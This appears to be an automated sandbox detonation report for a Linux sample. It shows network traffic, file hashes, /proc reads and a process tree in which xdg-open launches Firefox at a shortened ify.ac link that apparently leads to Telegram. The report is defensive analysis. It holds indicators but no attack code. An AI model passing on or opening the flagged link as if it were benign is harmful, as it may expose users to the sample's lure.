| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
| US | 1.1.1.1:53 | shavar.prod.mozaws.net | udp |
| US | 44.242.121.21:443 | shavar.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | push.services.mozilla.com | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 1.1.1.1:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | tracking-protection.prod.mozaws.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | aus5.mozilla.org | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| US | 1.1.1.1:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.209:80 | ciscobinary.openh264.org | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | t.me | udp |
| US | 1.1.1.1:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 1.1.1.1:53 | telegram.org | udp |
| US | 1.1.1.1:53 | telegram.org | udp |
| US | 1.1.1.1:53 | cdn5.cdn-telegram.org | udp |
| US | 1.1.1.1:53 | cdn5.cdn-telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | tcp |
| US | 34.111.108.175:443 | cdn5.cdn-telegram.org | udp |
| US | 1.1.1.1:53 | support.mozilla.org | udp |
| US | 1.1.1.1:53 | support.mozilla.org | udp |
| US | 1.1.1.1:53 | us-west1.prod.sumo.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
Files
/tmp/tmpaddon
| MD5 | 30082ae40dc48af6343db2fd22cfc645 |
| SHA1 | 3eb577555ee638e8beb01173e8f29e172747a728 |
| SHA256 | 85d4b95f9b2075daee9b0e64bce8d9d7343d0dda10e6072d7f9485a68472ee76 |
| SHA512 | 53a58bfb4c8124ad4f7655b99bfdea290033a085e0796b19245b33b91c0948fdac9f0c3e817130b352493a65d9a7a0fc8a7c1eedc618cdaa2b4580734a11cd9c |
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 17:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
1s
Max time network
5s
Command Line
Signatures
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/module/apparmor/parameters/enabled | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus/mask | /usr/bin/dbus-daemon | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/mounts | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/1596/attr/apparmor/current | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/1596/status | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/dbus-send | N/A |
| File opened for reading | /proc/1615/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/1582/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/grep | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1Ic5]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]
/usr/bin/dbus-daemon
[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/which
[which firefox]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/firefox
[/usr/bin/firefox https://ify.ac/1Ic5]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
/root/.dbus/session-bus/f2de92a803c744e586bd87567a26b68a-0
| MD5 | 75e581230f8e5d790ea568713f6cf2d2 |
| SHA1 | f924096f0b61f953e300a59073b7dc01522272be |
| SHA256 | be5c7236ecb1c2828cc6b7358167206514f3f6acfeb9250826601459e4518e98 |
| SHA512 | f8a962704560428ce1ed8dbde35aaf58823dc1e888b8a18230c810d692b00bafe22c60d2bc932ac033d3df6a37d2884372b644ae85e52f565f6ef5f3a2344123 |